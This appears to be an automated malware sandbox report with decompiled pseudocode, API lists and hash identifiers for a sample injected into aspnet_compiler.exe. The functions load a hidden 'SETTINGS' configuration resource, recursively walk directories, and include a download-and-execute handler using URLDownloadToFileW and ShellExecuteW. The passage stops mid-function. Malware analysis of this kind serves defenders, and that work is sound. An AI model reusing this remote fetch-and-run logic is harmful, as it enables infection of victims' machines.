                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                    • Instruction ID: f4dc62717276faaaa6782721abfec9566da5d0668c2a958c42eb904ffeb84586
                    • Opcode Fuzzy Hash: e1cc0e8b5d55e55e0692ae403176d07c371e2c9d392849c0dfe23d3819b2362a
                    • Instruction Fuzzy Hash: 2C21A73AA00205AAD7348F94D900A9B73B6EF54B52B568466ED0DDB203E736ED4DC398
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A003(void** __ecx) {
                    				struct HRSRC__* _t1;
                    				void* _t3;
                    				long _t4;
                    				void** _t5;
                    				struct HRSRC__* _t7;
                    
                    				_t5 = __ecx;
                    				_t1 = FindResourceA( *0x470d40, "SETTINGS", 0xa);
                    				_t7 = _t1;
                    				if(_t7 != 0) {
                    					_t3 = LockResource(LoadResource( *0x470d40, _t7));
                    					_t4 = SizeofResource( *0x470d40, _t7);
                    					 *_t5 = _t3;
                    					return _t4;
                    				}
                    				return _t1;
                    			}

                    APIs
                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A014
                    • LoadResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A028
                    • LockResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A02F
                    • SizeofResource.KERNEL32(00000000,?,?,0040E8FB,00000000), ref: 0041A03E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID: SETTINGS
                    • API String ID: 3473537107-594951305
                    • Opcode ID: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                    • Instruction ID: b95858df6d0456d97b6bbc8465da1c17ee9993c19fec26ac2e34289928cab2cf
                    • Opcode Fuzzy Hash: 2d1e4ba86f2e32d2beda4657f94b09353a7239f4cfd5f7509494277a44e50716
                    • Instruction Fuzzy Hash: 26E01A76205B10ABC7311FA1BC4CD073F29F789753B100035F909D6321DA358850CA59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00408D1B(intOrPtr __ecx, void* __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t77;
                    				intOrPtr* _t79;
                    				signed int _t89;
                    				signed int _t94;
                    				intOrPtr* _t98;
                    				void* _t115;
                    				signed int _t123;
                    				signed int _t125;
                    				void* _t142;
                    				signed int _t143;
                    				intOrPtr _t146;
                    				char* _t209;
                    				void* _t213;
                    				void* _t217;
                    				void* _t219;
                    				intOrPtr _t220;
                    				void* _t221;
                    				void* _t223;
                    
                    				_t146 = __ecx;
                    				E00456328(E0045670D, _t217);
                    				_t220 = _t219 - 0x308;
                    				_push(_t142);
                    				 *((intOrPtr*)(_t217 - 0x10)) = _t220;
                    				 *((intOrPtr*)(_t217 - 0x18)) = _t146;
                    				E004020BF(_t142, _t217 - 0x5c);
                    				_t77 = E004022E5(_t217 + 0x20, _t217 - 0x1c);
                    				_t79 = E004022AA(_t217 + 0x20, _t217 - 0x20);
                    				E00409291(_t217 - 0x28,  *((intOrPtr*)(E004022E5(_t217 + 0x20, _t217 - 0x24))),  *_t79,  *_t77);
                    				_t221 = _t220 + 0xc;
                    				_t202 = _t217 + 8;
                    				_t213 = FindFirstFileW(E00401EE4(E004087F0(_t217 - 0xbc, _t217 + 8, _t217, "*")), _t217 - 0x30c);
                    				 *(_t217 - 0x1c) = _t213;
                    				E00401EE9();
                    				if(_t213 != 0xffffffff) {
                    					_t143 = 0;
                    					__eflags = 0;
                    					while(1) {
                    						_t89 = FindNextFileW(_t213, _t217 - 0x30c);
                    						__eflags = _t89;
                    						if(_t89 == 0) {
                    							break;
                    						}
                    						_t209 =  *((intOrPtr*)(_t217 - 0x18));
                    						__eflags =  *_t209;
                    						if( *_t209 == 0) {
                    							__eflags =  *(_t217 - 0x30c) & 0x00000010;
                    							if(( *(_t217 - 0x30c) & 0x00000010) != 0) {
                    								_t123 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, 0x4644f0);
                    								__eflags = _t123;
                    								if(_t123 != 0) {
                    									_t125 = E0043E224(_t217 - 0x2e0, _t217 - 0x2e0, L"..");
                    									_pop(_t170);
                    									__eflags = _t125;
                    									if(__eflags != 0) {
                    										_t202 = E00408876(_t143, _t217 - 0x8c, _t217 + 8, _t217, __eflags, E0040415E(_t143, _t217 - 0x74, _t202, _t217, _t217 - 0x2e0));
                    										E004092BB(_t143, _t217 - 0xa4, _t128, _t209, __eflags);
                    										E00401EE9();
                    										E00401EE9();
                    										_t223 = _t221 - 0x18;
                    										E004086D0(_t143, _t223, _t128, __eflags, _t217 + 0x20);
                    										_t221 = _t223 - 0x18;
                    										E004086D0(_t143, _t221, _t128, __eflags, _t217 - 0xa4);
                    										E00408D1B(_t209, _t202, __eflags);
                    										E00401EE9();
                    									}
                    								}
                    							}
                    							E0040415E(_t143, _t217 - 0x40, _t202, _t217, _t217 - 0x2e0);
                    							_t98 = E004022E5(_t217 - 0x40, _t217 - 0x28);
                    							_t215 = E004022AA(_t217 - 0x40, _t217 - 0x24);
                    							E00409291(_t217 - 0x44,  *((intOrPtr*)(E004022E5(_t217 - 0x40, _t217 - 0x20))),  *_t100,  *_t98);
                    							_t221 = _t221 + 0xc;
                    							__eflags = E00409114(_t217 - 0x40, _t217 + 0x20, _t143) - 0xffffffff;
                    							if(__eflags == 0) {
                    								L15:
                    								E00401EE9();
                    								_t213 =  *(_t217 - 0x1c);
                    								continue;
                    							} else {
                    								E00401FC2(_t217 - 0x5c, _t202, _t215, E00402097(_t143, _t217 - 0x74, _t202, _t217, __eflags, _t217 - 0x30c, 0x250));
                    								E00401FB8();
                    								 *(_t217 - 4) = _t143;
                    								_t221 = _t221 - 0x18;
                    								_t202 = E00402EF0(_t143, _t217 - 0x74, E0041A879(_t143, _t217 - 0x8c, _t217 + 8), _t217, __eflags, 0x472ec8);
                    								E00402EF0(_t143, _t221, _t113, _t217, __eflags, _t217 - 0x5c);
                    								_push(0x66);
                    								_t115 = E00404A81( *((intOrPtr*)(_t217 - 0x18)) + 4, _t113, __eflags);
                    								__eflags = _t115 - 0xffffffff;
                    								E00401FB8();
                    								E00401FB8();
                    								__eflags = _t143 & 0xffffff00 | _t115 == 0xffffffff;
                    								if((_t143 & 0xffffff00 | _t115 == 0xffffffff) == 0) {
                    									 *(_t217 - 4) =  *(_t217 - 4) | 0xffffffff;
                    									_t143 = 0;
                    									__eflags = 0;
                    									goto L15;
                    								}
                    								E00401EE9();
                    								E00401FB8();
                    								E00401EE9();
                    								E00401EE9();
                    								_t94 = 0;
                    								goto L17;
                    							}
                    						}
                    						FindClose(_t213);
                    						goto L6;
                    					}
                    					FindClose(_t213);
                    					E00401FB8();
                    					E00401EE9();
                    					E00401EE9();
                    					_t94 = 1;
                    					goto L17;
                    				} else {
                    					_t143 = 1;
                    					L6:
                    					E00401FB8();
                    					E00401EE9();
                    					E00401EE9();
                    					_t94 = _t143;
                    					L17:
                    					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
                    					return _t94;
                    				}
                    			}

                    APIs
                    • __EH_prolog.LIBCMT ref: 00408D20
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00408D98
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408DC1
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408DD8
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstH_prologNext
                    • String ID:
                    • API String ID: 1157919129-0
                    • Opcode ID: a048aa1da0b071b9debaa37a7fc6f94ec157a5e3885293fddf674d67e6c0daf6
                    • Instruction ID: b34c8ff471b712c414ce627f555fa5c2b30a51ca04011b772a5ffd3e96ebdc4c
                    • Opcode Fuzzy Hash: a048aa1da0b071b9debaa37a7fc6f94ec157a5e3885293fddf674d67e6c0daf6
                    • Instruction Fuzzy Hash: 7D8153328001099BCB15EBA1DD969EE77B8AF54308F10417FE446B71E2EF385B49CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00407E80(void* __ecx, void* __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t62;
                    				void* _t78;
                    				void* _t88;
                    				void* _t89;
                    				void* _t97;
                    				void* _t99;
                    				void* _t111;
                    				void* _t114;
                    				void* _t118;
                    				void* _t120;
                    				void* _t167;
                    				void* _t169;
                    				void* _t170;
                    				void* _t172;
                    				void* _t174;
                    				intOrPtr _t175;
                    				void* _t176;
                    				void* _t177;
                    				void* _t179;
                    				void* _t180;
                    				void* _t181;
                    				void* _t182;
                    				void* _t183;
                    				void* _t184;
                    				void* _t185;
                    
                    				_t165 = __edx;
                    				_t120 = __ecx;
                    				E00456328(E004566F9, _t172);
                    				_t175 = _t174 - 0x2b0;
                    				_push(_t169);
                    				_push(_t167);
                    				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
                    				_t118 = _t120;
                    				E004020BF(_t118, _t172 - 0x4c);
                    				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
                    				if(_t118 != 0) {
                    					_t165 = 0x46a8f0;
                    					_t111 = E00406E3A(0x46a8f0);
                    					_t188 = _t111;
                    					if(_t111 != 0) {
                    						_t185 = _t175 - 0x18;
                    						E004086D0(_t118, _t185, 0x46a8f0, _t188, _t172 + 8);
                    						_t114 = E00419F8D(_t118, _t172 - 0x34, 0x46a8f0, _t172);
                    						_t175 = _t185 + 0x18;
                    						E00401EF3(_t172 + 0x20, _t165, _t169, _t114);
                    						E00401EE9();
                    					}
                    				}
                    				_t176 = _t175 - 0x18;
                    				E004086D0(_t118, _t176, _t165, _t188, _t172 + 8);
                    				_t62 = E00419FC8(_t118, _t172 - 0x34, _t165, _t172);
                    				_t177 = _t176 + 0x18;
                    				E0040323D(_t62);
                    				E00401EE9();
                    				L004086C6(_t118, _t172 + 8, _t167, _t172, "\\");
                    				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
                    				_t166 = _t172 + 8;
                    				_t170 = FindFirstFileW(E00401EE4(E004087F0(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
                    				 *(_t172 - 0x18) = _t170;
                    				E00401EE9();
                    				if(_t170 == 0xffffffff) {
                    					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
                    					E004379F6(_t172 - 0x1c, 0x46ccd0);
                    				}
                    				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
                    					if( *0x470b18 != 0) {
                    						E00401FB8();
                    						E00401EE9();
                    						E00401EE9();
                    						E00401FB8();
                    						_t78 = 0;
                    						__eflags = 0;
                    						L15:
                    						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
                    						return _t78;
                    					}
                    					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
                    						_t179 = _t177 - 0x18;
                    						E004020D6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
                    						_t180 = _t179 - 0x18;
                    						E004086D0(_t118, _t180, _t166, __eflags, _t172 + 0x20);
                    						_t88 = E0040415E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
                    						_t166 = _t172 + 8;
                    						_t89 = E00408876(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
                    						_t181 = _t180 - 0x14;
                    						E00403242(_t118, _t181, _t172, __eflags, _t89);
                    						E004080F9(_t118, _t172 + 8, _t167);
                    						_t177 = _t181 + 0x48;
                    						E00401EE9();
                    						L11:
                    						E00401EE9();
                    						continue;
                    					}
                    					if(E0043E224(_t172 - 0x288, _t172 - 0x288, 0x4644f0) == 0) {
                    						continue;
                    					}
                    					_t97 = E0043E224(_t172 - 0x288, _t172 - 0x288, L"..");
                    					_t194 = _t97;
                    					if(_t97 == 0) {
                    						continue;
                    					}
                    					_t99 = E0040415E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
                    					_t166 = _t172 + 8;
                    					E00408876(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
                    					E00401EE9();
                    					_t182 = _t177 - 0x18;
                    					E004020D6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
                    					_t183 = _t182 - 0x18;
                    					E004086D0(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
                    					_t184 = _t183 - 0x18;
                    					E004086D0(_t118, _t184, _t166, _t194, _t172 - 0x34);
                    					E00407E80(_t118, _t166, _t194);
                    					_t177 = _t184 + 0x48;
                    					goto L11;
                    				}
                    				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
                    				FindClose(_t170);
                    				E00401FB8();
                    				E00401EE9();
                    				E00401EE9();
                    				E00401FB8();
                    				_t78 = 1;
                    				goto L15;
                    			}

                    APIs
                    • __EH_prolog.LIBCMT ref: 00407E85
                    • FindFirstFileW.KERNEL32(00000000,?,004645D0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F3E
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00407F66
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F73
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408089
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                    • String ID:
                    • API String ID: 1771804793-0
                    • Opcode ID: 29df80f529d97faa74b0004cd5527f10f402c30c4d9ef8439814f7fe3f3b588e
                    • Instruction ID: eb919791392cef61e63247088396cac0e0337327006fc65e235cea095d5a35b6
                    • Opcode Fuzzy Hash: 29df80f529d97faa74b0004cd5527f10f402c30c4d9ef8439814f7fe3f3b588e
                    • Instruction Fuzzy Hash: 2F51517190020996CB04FBA1DD969DD77A8AF50308F50457FF846B31E2EF389B49CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00406524(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                    				char _v28;
                    				char _v44;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v76;
                    				char _v84;
                    				void* _v104;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t33;
                    				void* _t50;
                    				signed char _t54;
                    				intOrPtr* _t57;
                    				void* _t59;
                    				void* _t63;
                    				void* _t70;
                    				void* _t72;
                    				void* _t77;
                    				intOrPtr* _t79;
                    				short* _t83;
                    				void* _t84;
                    				void* _t85;
                    				void* _t87;
                    				void* _t105;
                    				void* _t119;
                    				void* _t143;
                    				void* _t147;
                    				void* _t154;
                    				signed int _t155;
                    				void* _t158;
                    				void* _t159;
                    				void* _t160;
                    				void* _t162;
                    				void* _t166;
                    
                    				_t166 = __eflags;
                    				_t138 = __edx;
                    				_t33 = E00401F8B( &_a8);
                    				_push(0xffffffff);
                    				_t87 = 4;
                    				_push(_t87);
                    				_push( &_v28);
                    				E00404182( &_a8);
                    				_t158 = (_t155 & 0xfffffff8) - 0x2c;
                    				E004020D6(_t87, _t158, __edx, _t166, 0x472ec8);
                    				_t159 = _t158 - 0x18;
                    				E004020D6(_t87, _t159, __edx, _t166,  &_v44);
                    				E0041A976( &_v84, __edx);
                    				_t160 = _t159 + 0x30;
                    				_t147 =  *_t33 - _t87;
                    				if(_t147 == 0) {
                    					_t143 = 0;
                    					E00401E45( &_v64, __edx, _t154, __eflags, 0);
                    					__eflags = E00405AE5("F");
                    					if(__eflags == 0) {
                    						E00401E45( &_v68, "F", _t154, __eflags, 0);
                    						_t138 = "M";
                    						__eflags = E00405AE5("M");
                    						if(__eflags == 0) {
                    							L23:
                    							E00401E6D( &_v64, _t138);
                    							E00401FB8();
                    							E00401FB8();
                    							return 0;
                    						}
                    						_v68 = 0;
                    						_t50 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
                    						_t138 =  &_v76;
                    						__eflags = E0041A551(_t50,  &_v76,  &_v68);
                    						if(__eflags == 0) {
                    							_t105 = _t160 - 0x18;
                    							_push("2");
                    							L22:
                    							E00402073(_t87, _t105, _t138, _t154);
                    							_push(0xb3);
                    							E00404A81(_a4, _t138, __eflags);
                    							goto L23;
                    						}
                    						_t138 = _v72;
                    						_t54 = E00417456(0x470b38);
                    						L0043A61B(_v72);
                    						_t162 = _t160 - 0x18;
                    						__eflags = (_t54 & 0x000000ff) - 1;
                    						L9:
                    						_t105 = _t162;
                    						if(__eflags != 0) {
                    							_push("3");
                    						} else {
                    							_push("1");
                    						}
                    						goto L22;
                    					}
                    					_t57 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 2));
                    					_t59 = E00401F8B(E00401E45( &_v68, "F", _t154, __eflags, 3));
                    					_t138 =  *_t57;
                    					E0040CF38( &_v60,  *_t57, _t59);
                    					_t63 = E00401F8B(E00401E45( &_v72,  *_t57, _t154, __eflags, _t87));
                    					__imp__URLDownloadToFileW(0, _t63, E00401EE4( &_v60), 0, 0);
                    					__eflags = _t63;
                    					if(__eflags == 0) {
                    						L4:
                    						if( *((char*)(E00401F8B(E00401E45( &_v84, _t138, _t154, _t170, 1)))) == 0) {
                    							_t119 = _t160 - 0x18;
                    							_push("0");
                    						} else {
                    							_t70 = ShellExecuteW(_t143, L"open", E00401EE4( &_v72), _t143, _t143, 1);
                    							_t119 = _t160 - 0x18;
                    							_t172 = _t70 - 0x20;
                    							if(_t70 > 0x20) {
                    								_push("1");
                    							} else {
                    								_push("3");
                    							}
                    						}
                    						L17:
                    						E00402073(_t87, _t119, _t138, _t154);
                    						_push(0xb3);
                    						E00404A81(_a4, _t138, _t172);
                    						E00401EE9();
                    						goto L23;
                    					}
                    					L14:
                    					_t119 = _t160 - 0x18;
                    					_push("2");
                    					goto L17;
                    				}
                    				_t168 = _t147 != 1;
                    				if(_t147 != 1) {
                    					goto L23;
                    				}
                    				_t143 = 0;
                    				E00401E45( &_v64, __edx, _t154, _t168, 0);
                    				_t72 = E00405AE5("F");
                    				_t169 = _t72;
                    				if(_t72 == 0) {
                    					E00401E45( &_v68, "F", _t154, __eflags, 0);
                    					_t138 = "M";
                    					__eflags = E00405AE5("M");
                    					if(__eflags == 0) {
                    						goto L23;
                    					} else {
                    						_t138 = E00401F8B(E00401E45( &_v64, "M", _t154, __eflags, _t87));
                    						_t77 = E00417456(0x470b38);
                    						_t162 = _t160 - 0x18;
                    						__eflags = _t77 - 1;
                    						goto L9;
                    					}
                    				}
                    				_t79 = E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 2));
                    				E0040CF38( &_v60,  *_t79, E00401F8B(E00401E45( &_v68, "F", _t154, _t169, 3)));
                    				_t83 = E00401EE4( &_v60);
                    				_t84 = E00401E45( &_v72,  *_t79, _t154, _t169, _t87);
                    				_t138 = _t83;
                    				_t85 = E0041AE6B(_t84, _t83);
                    				_t170 = _t85 - 1;
                    				if(_t85 != 1) {
                    					goto L14;
                    				}
                    				goto L4;
                    			}

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406630
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406714
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe$open
                    • API String ID: 2825088817-4294605632
                    • Opcode ID: 2402fc3655f45c4dc183d6008799e5827585dc3f7f04836c9f6914f2199e61ed
                    • Instruction ID: 0db7feb28fe899170bc1ff05edd6f0e9b1c7309e9c1e85d08ff0b0aee6ae3b0b
                    • Opcode Fuzzy Hash: 2402fc3655f45c4dc183d6008799e5827585dc3f7f04836c9f6914f2199e61ed
                    • Instruction Fuzzy Hash: 2C61E531A0430157CA14FB75C8A69BE77A99FD1308F10093FF942771D2EE3D8919869B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00450943(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                    				signed int _v8;
                    				short _v248;
                    				signed int _v252;
                    				intOrPtr _v256;
                    				void* __ebp;
                    				signed int _t50;
                    				signed int _t58;
                    				signed int _t67;
                    				signed int _t69;
                    				signed int _t72;
                    				signed int _t73;
                    				intOrPtr _t75;
                    				signed int _t76;
                    				signed int _t84;
                    				signed int _t86;
                    				signed int _t87;
                    				signed int _t89;
                    				intOrPtr _t90;
                    				void* _t92;
                    				intOrPtr* _t113;
                    				void* _t117;
                    				intOrPtr* _t119;
                    				signed int _t123;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int _t126;
                    				void* _t127;
                    				signed int* _t129;
                    				int _t132;
                    				signed int _t133;
                    				void* _t134;
                    
                    				_t50 =  *0x46f00c; // 0x54ba778e
                    				_v8 = _t50 ^ _t133;
                    				_t92 = E00446A95(__ebx, __ecx, __edx);
                    				_t129 =  *(E00446A95(_t92, __ecx, __edx) + 0x34c);
                    				_t132 = E00450C6B(_a4);
                    				asm("sbb ecx, ecx");
                    				if(GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x64)) & 0xfffff005) + 0x1002,  &_v248, 0x78) != 0) {
                    					_t58 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x54)),  &_v248);
                    					_v252 = _v252 & 0x00000000;
                    					__eflags = _t58;
                    					if(_t58 != 0) {
                    						L18:
                    						__eflags = ( *_t129 & 0x00000300) - 0x300;
                    						if(( *_t129 & 0x00000300) == 0x300) {
                    							L39:
                    							__eflags =  !( *_t129 >> 2) & 0x00000001;
                    							L40:
                    							return E004338BB(_v8 ^ _t133);
                    						}
                    						asm("sbb ecx, ecx");
                    						_t67 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    						__eflags = _t67;
                    						if(_t67 != 0) {
                    							_t69 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                    							__eflags = _t69;
                    							if(_t69 != 0) {
                    								__eflags =  *(_t92 + 0x60);
                    								if( *(_t92 + 0x60) != 0) {
                    									goto L39;
                    								}
                    								__eflags =  *(_t92 + 0x5c);
                    								if( *(_t92 + 0x5c) == 0) {
                    									goto L39;
                    								}
                    								_t72 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                    								__eflags = _t72;
                    								if(_t72 != 0) {
                    									goto L39;
                    								}
                    								_push(_t129);
                    								_t73 = E00450DC3(0, _t132, 0);
                    								__eflags = _t73;
                    								if(_t73 == 0) {
                    									goto L39;
                    								}
                    								 *_t129 =  *_t129 | 0x00000100;
                    								__eflags = _t129[1];
                    								L37:
                    								if(__eflags == 0) {
                    									_t129[1] = _t132;
                    								}
                    								goto L39;
                    							}
                    							 *_t129 =  *_t129 | 0x00000200;
                    							_t123 =  *_t129;
                    							__eflags =  *(_t92 + 0x60) - _t69;
                    							if( *(_t92 + 0x60) == _t69) {
                    								__eflags =  *(_t92 + 0x5c) - _t69;
                    								if( *(_t92 + 0x5c) == _t69) {
                    									goto L23;
                    								}
                    								_t113 =  *((intOrPtr*)(_t92 + 0x50));
                    								_v256 = _t113 + 2;
                    								do {
                    									_t75 =  *_t113;
                    									_t113 = _t113 + 2;
                    									__eflags = _t75 - _v252;
                    								} while (_t75 != _v252);
                    								__eflags = _t113 - _v256 >> 1 -  *(_t92 + 0x5c);
                    								if(_t113 - _v256 >> 1 !=  *(_t92 + 0x5c)) {
                    									_t69 = 0;
                    									goto L23;
                    								}
                    								_push(_t129);
                    								_t76 = E00450DC3(_t92, _t132, 1);
                    								__eflags = _t76;
                    								if(_t76 == 0) {
                    									goto L39;
                    								}
                    								 *_t129 =  *_t129 | 0x00000100;
                    								_t69 = 0;
                    								L24:
                    								__eflags = _t129[1] - _t69;
                    								goto L37;
                    							}
                    							L23:
                    							_t124 = _t123 | 0x00000100;
                    							__eflags = _t124;
                    							 *_t129 = _t124;
                    							goto L24;
                    						}
                    						 *_t129 = _t67;
                    						L2:
                    						goto L40;
                    					}
                    					asm("sbb eax, eax");
                    					_t84 = GetLocaleInfoW(_t132, ( ~( *(_t92 + 0x60)) & 0xfffff002) + 0x1001,  &_v248, 0x78);
                    					__eflags = _t84;
                    					if(_t84 == 0) {
                    						goto L1;
                    					}
                    					_t86 = E00452294(_t92, _t129, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248);
                    					_pop(_t117);
                    					__eflags = _t86;
                    					if(_t86 != 0) {
                    						__eflags =  *_t129 & 0x00000002;
                    						if(( *_t129 & 0x00000002) != 0) {
                    							goto L18;
                    						}
                    						__eflags =  *(_t92 + 0x5c);
                    						if( *(_t92 + 0x5c) == 0) {
                    							L14:
                    							_t125 =  *_t129;
                    							__eflags = _t125 & 0x00000001;
                    							if((_t125 & 0x00000001) != 0) {
                    								goto L18;
                    							}
                    							_t87 = E00450D9F(_t132);
                    							__eflags = _t87;
                    							if(_t87 == 0) {
                    								goto L18;
                    							}
                    							_t126 = _t125 | 0x00000001;
                    							__eflags = _t126;
                    							 *_t129 = _t126;
                    							goto L17;
                    						}
                    						_t89 = E0044008E(_t92, _t117, _t132,  *((intOrPtr*)(_t92 + 0x50)),  &_v248,  *(_t92 + 0x5c));
                    						_t134 = _t134 + 0xc;
                    						__eflags = _t89;
                    						if(_t89 != 0) {
                    							goto L14;
                    						}
                    						 *_t129 =  *_t129 | 0x00000002;
                    						__eflags =  *_t129;
                    						_t129[2] = _t132;
                    						_t119 =  *((intOrPtr*)(_t92 + 0x50));
                    						_t127 = _t119 + 2;
                    						do {
                    							_t90 =  *_t119;
                    							_t119 = _t119 + 2;
                    							__eflags = _t90 - _v252;
                    						} while (_t90 != _v252);
                    						__eflags = _t119 - _t127 >> 1 -  *(_t92 + 0x5c);
                    						if(_t119 - _t127 >> 1 ==  *(_t92 + 0x5c)) {
                    							_t129[1] = _t132;
                    						}
                    					} else {
                    						 *_t129 =  *_t129 | 0x00000304;
                    						_t129[1] = _t132;
                    						L17:
                    						_t129[2] = _t132;
                    					}
                    					goto L18;
                    				}
                    				L1:
                    				 *_t129 =  *_t129 & 0x00000000;
                    				goto L2;
                    			}

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450997
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004509E8
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450AA8
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorInfoLastLocale$_free$_abort
                    • String ID:
                    • API String ID: 2829624132-0
                    • Opcode ID: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                    • Instruction ID: da7bcabd89bfc395045dfa7eb9e966dc36f5abb2093a3d853536695ab6a7a704
                    • Opcode Fuzzy Hash: 23d8e905687bc38429d1be92d1a08982c83e9c62d6a5deb4e14a37c3f35087c4
                    • Instruction Fuzzy Hash: E361A3795002079FEB289F64CC82B7B77A8EF14306F1081ABED05C6246E778ED49CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E0043A3F1(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				char _v0;
                    				signed int _v8;
                    				intOrPtr _v524;
                    				intOrPtr _v528;
                    				void* _v532;
